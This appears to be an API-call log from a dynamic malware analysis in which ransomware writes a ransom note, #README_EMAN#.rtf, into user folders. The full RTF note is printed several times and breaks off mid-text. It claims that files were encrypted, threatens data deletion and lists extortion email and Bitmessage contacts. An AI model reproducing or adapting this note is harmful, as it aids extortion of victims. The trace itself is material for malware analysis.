l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.585] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef5068, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nzráb\x95.ê©ÀAH\x01¹HÂP[w.\x80¬Ñ%cD", lpUsedDefaultChar=0x0) returned 8717 [0278.585] WriteFile (in: hFile=0x2c8, lpBuffer=0x1ef5068*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef5068*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.586] CloseHandle (hObject=0x2c8) returned 1 [0278.586] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\#readme_eman#.rtf")) returned 0xffffffff [0278.586] GetLastError () returned 0x2 [0278.586] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ro\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0278.586] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n 